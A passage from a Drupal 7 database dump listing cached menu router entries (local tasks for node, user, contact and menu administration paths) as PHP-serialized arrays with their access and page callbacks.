block\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:29:\"modules/block/block.admin.inc\";}}',0,1424617194,1),('local_tasks:admin/structure/contact','a:2:{i:0;a:23:{s:4:\"path\";s:23:\"admin/structure/contact\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer contact forms\";}\";s:13:\"page_callback\";s:21:\"contact_category_list\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"7\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:23:\"admin/structure/contact\";s:5:\"title\";s:12:\"Contact form\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:71:\"Create a system contact form and set up categories for the form to use.\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:33:\"modules/contact/contact.admin.inc\";}i:1;a:23:{s:4:\"path\";s:27:\"admin/structure/contact/add\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer contact forms\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:44:\"a:1:{i:0;s:26:\"contact_category_edit_form\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"15\";s:12:\"number_parts\";s:1:\"4\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:23:\"admin/structure/contact\";s:8:\"tab_root\";s:23:\"admin/structure/contact\";s:5:\"title\";s:12:\"Add category\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"388\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"1\";s:12:\"include_file\";s:33:\"modules/contact/contact.admin.inc\";}}',0,1423658794,1),('local_tasks:admin/structure/menu/manage/%','a:4:{i:0;a:23:{s:4:\"path\";s:34:\"admin/structure/menu/manage/%/list\";s:14:\"load_functions\";s:26:\"a:1:{i:4;s:9:\"menu_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:44:\"a:2:{i:0;s:18:\"menu_overview_form\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"61\";s:12:\"number_parts\";s:1:\"6\";s:7:\"context\";s:1:\"3\";s:10:\"tab_parent\";s:29:\"admin/structure/menu/manage/%\";s:8:\"tab_root\";s:29:\"admin/structure/menu/manage/%\";s:5:\"title\";s:10:\"List links\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:3:\"-10\";s:12:\"include_file\";s:27:\"modules/menu/menu.admin.inc\";}i:1;a:23:{s:4:\"path\";s:33:\"admin/structure/menu/manage/%/add\";s:14:\"load_functions\";s:26:\"a:1:{i:4;s:9:\"menu_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:60:\"a:4:{i:0;s:14:\"menu_edit_item\";i:1;s:3:\"add\";i:2;N;i:3;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"61\";s:12:\"number_parts\";s:1:\"6\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:29:\"admin/structure/menu/manage/%\";s:8:\"tab_root\";s:29:\"admin/structure/menu/manage/%\";s:5:\"title\";s:8:\"Add link\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"388\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:27:\"modules/menu/menu.admin.inc\";}i:2;a:23:{s:4:\"path\";s:29:\"admin/structure/menu/manage/%\";s:14:\"load_functions\";s:26:\"a:1:{i:4;s:9:\"menu_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:44:\"a:2:{i:0;s:18:\"menu_overview_form\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"30\";s:12:\"number_parts\";s:1:\"5\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:29:\"admin/structure/menu/manage/%\";s:5:\"title\";s:14:\"Customize menu\";s:14:\"title_callback\";s:19:\"menu_overview_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:4;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:27:\"modules/menu/menu.admin.inc\";}i:3;a:23:{s:4:\"path\";s:34:\"admin/structure/menu/manage/%/edit\";s:14:\"load_functions\";s:26:\"a:1:{i:4;s:9:\"menu_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:55:\"a:3:{i:0;s:14:\"menu_edit_menu\";i:1;s:4:\"edit\";i:2;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"61\";s:12:\"number_parts\";s:1:\"6\";s:7:\"context\";s:1:\"3\";s:10:\"tab_parent\";s:29:\"admin/structure/menu/manage/%\";s:8:\"tab_root\";s:29:\"admin/structure/menu/manage/%\";s:5:\"title\";s:9:\"Edit menu\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:27:\"modules/menu/menu.admin.inc\";}}',0,1423659147,1),('local_tasks:node','a:1:{i:0;a:23:{s:4:\"path\";s:4:\"node\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:32:\"a:1:{i:0;s:14:\"access content\";}\";s:13:\"page_callback\";s:17:\"node_page_default\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"1\";s:12:\"number_parts\";s:1:\"1\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:4:\"node\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"0\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:0:\"\";}}',0,1423658787,1),('local_tasks:node/%','a:5:{i:0;a:23:{s:4:\"path\";s:11:\"node/%/view\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"5\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:6:\"node/%\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:4:\"View\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:3:\"-10\";s:12:\"include_file\";s:0:\"\";}i:1;a:23:{s:4:\"path\";s:6:\"node/%\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"2\";s:12:\"number_parts\";s:1:\"2\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:0:\"\";}i:2;a:23:{s:4:\"path\";s:11:\"node/%/edit\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:31:\"a:2:{i:0;s:6:\"update\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_edit\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"5\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"3\";s:10:\"tab_parent\";s:6:\"node/%\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:4:\"Edit\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:27:\"modules/node/node.pages.inc\";}i:3;a:23:{s:4:\"path\";s:16:\"node/%/revisions\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:21:\"_node_revision_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:13:\"page_callback\";s:22:\"node_revision_overview\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"5\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:6:\"node/%\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:9:\"Revisions\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"2\";s:12:\"include_file\";s:27:\"modules/node/node.pages.inc\";}i:4;a:23:{s:4:\"path\";s:12:\"node/%/track\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:23:\"statistics_node_tracker\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"5\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:6:\"node/%\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:5:\"Track\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"2\";s:12:\"include_file\";s:39:\"modules/statistics/statistics.pages.inc\";}}',0,1423658921,1),('local_tasks:node/add','a:1:{i:0;a:23:{s:4:\"path\";s:8:\"node/add\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:16:\"_node_add_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:13:\"node_add_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"3\";s:12:\"number_parts\";s:1:\"2\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:8:\"node/add\";s:5:\"title\";s:11:\"Add content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:27:\"modules/node/node.pages.inc\";}}',0,1423658888,1),('local_tasks:node/add/article','a:1:{i:0;a:23:{s:4:\"path\";s:16:\"node/add/article\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:41:\"a:2:{i:0;s:6:\"create\";i:1;s:7:\"article\";}\";s:13:\"page_callback\";s:8:\"node_add\";s:14:\"page_arguments\";s:24:\"a:1:{i:0;s:7:\"article\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"7\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"node/add/article\";s:5:\"title\";s:7:\"Article\";s:14:\"title_callback\";s:11:\"check_plain\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:89:\"Use articles for time-sensitive content like news, press releases or blog posts.\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:27:\"modules/node/node.pages.inc\";}}',0,1423658892,1),('local_tasks:user','a:4:{i:0;a:23:{s:4:\"path\";s:4:\"user\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:1:\"1\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:9:\"user_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"1\";s:12:\"number_parts\";s:1:\"1\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:4:\"user\";s:5:\"title\";s:12:\"User account\";s:14:\"title_callback\";s:15:\"user_menu_title\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:3:\"-10\";s:12:\"include_file\";s:27:\"modules/user/user.pages.inc\";}i:1;a:23:{s:4:\"path\";s:13:\"user/register\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:20:\"user_register_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"user_register_form\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"3\";s:12:\"number_parts\";s:1:\"2\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:4:\"user\";s:8:\"tab_root\";s:4:\"user\";s:5:\"title\";s:18:\"Create new account\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:0:\"\";}i:2;a:23:{s:4:\"path\";s:10:\"user/login\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:17:\"user_is_anonymous\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:9:\"user_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"3\";s:12:\"number_parts\";s:1:\"2\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:4:\"user\";s:8:\"tab_root\";s:4:\"user\";s:5:\"title\";s:6:\"Log in\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:27:\"modules/user/user.pages.inc\";}i:3;a:23:{s:4:\"path\";s:13:\"user/password\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:1:\"1\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:26:\"a:1:{i:0;s:9:\"user_pass\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"3\";s:12:\"number_parts\";s:1:\"2\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:4:\"user\";s:8:\"tab_root\";s:4:\"user\";s:5:\"title\";s:20:\"Request new password\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:27:\"modules/user/user.pages.inc\";}}',0,1423782247,1),('local_tasks:user/%','a:7:{i:0;a:23:{s:4:\"path\";s:11:\"user/%/view\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"user_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:16:\"user_view_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:13:\"page_callback\";s:14:\"user_view_page\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"5\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:6:\"user/%\";s:8:\"tab_root\";s:6:\"user/%\";s:5:\"title\";s:4:\"View\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:3:\"-10\";s:12:\"include_file\";s:0:\"\";}i:1;a:23:{s:4:\"path\";s:19:\"user/%/edit/account\";s:14:\"load_functions\";s:80:\"a:1:{i:1;a:1:{s:18:\"user_category_load\";a:2:{i:0;s:4:\"%map\";i:1;s:6:\"%index\";}}}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:16:\"user_edit_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:43:\"a:2:{i:0;s:17:\"user_profile_form\";i:1;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"11\";s:12:\"number_parts\";s:1:\"4\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:11:\"user/%/edit\";s:8:\"tab_root\";s:6:\"user/%\";s:5:\"title\";s:7:\"Account\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:27:\"modules/user/user.pages.inc\";}i:2;a:23:{s:4:\"path\";s:11:\"user/%/edit\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"user_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:16:\"user_edit_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:43:\"a:2:{i:0;s:17:\"user_profile_form\";i:1;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"5\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:6:\"user/%\";s:8:\"tab_root\";s:6:\"user/%\";s:5:\"title\";s:4:\"Edit\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:27:\"modules/user/user.pages.inc\";}i:3;a:23:{s:4:\"path\";s:6:\"user/%\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"user_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:16:\"user_view_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:13:\"page_callback\";s:14:\"user_view_page\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"2\";s:12:\"number_parts\";s:1:\"2\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"user/%\";s:5:\"title\";s:10:\"My account\";s:14:\"title_callback\";s:15:\"user_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:0:\"\";}i:4;a:23:{s:4:\"path\";s:16:\"user/%/shortcuts\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"user_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:26:\"shortcut_set_switch_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:45:\"a:2:{i:0;s:19:\"shortcut_set_switch\";i:1;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"5\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:6:\"user/%\";s:8:\"tab_root\";s:6:\"user/%\";s:5:\"title\";s:9:\"Shortcuts\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:35:\"modules/shortcut/shortcut.admin.inc\";}i:5;a:23:{s:4:\"path\";s:14:\"user/%/contact\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"user_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:28:\"_contact_personal_tab_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:47:\"a:2:{i:0;s:21:\"contact_personal_form\";i:1;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"5\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:6:\"user/%\";s:8:\"tab_root\";s:6:\"user/%\";s:5:\"title\";s:7:\"Contact\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"2\";s:12:\"include_file\";s:33:\"modules/contact/contact.pages.inc\";}i:6;a:23:{s:4:\"path\";s:23:\"user/%/track/navigation\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"user_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:23:\"statistics_user_tracker\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"11\";s:12:\"number_parts\";s:1:\"4\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:6:\"user/%\";s:8:\"tab_root\";s:6:\"user/%\";s:5:\"title\";s:17:\"Track page visits\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"2\";s:12:\"include_file\";s:39:\"modules/statistics/statistics.pages.inc\";}}',0,1423658805,1),('menu_custom','a:4:{s:9:\"main-menu\";a:3:{s:9:\"menu_name\";s:9:\"main-menu\";s:5:\"title\";s:9:\"Main menu\";s:11:\"description\";s:115:\"The Main menu is used on many sites to show the major sections of the site, often in a top navigation bar.\";}s:10:\"management\";a:3:{s:9:\"menu_name\";s:10:\"management\";s:5:\"title\";s:10:\"Management\";s:11:\"description\";s:69:\"The Management menu contains links for administrative tasks.\";}s:10:\"navigation\";a:3:{s:9:\"menu_name\";s:10:\"navigation\";s:5:\"title\";s:10:\"Navigation\";s:11:\"description\";s:150:\"The Navigation menu contains links intended for site visitors. Links are added to the Navigation menu automatically by some 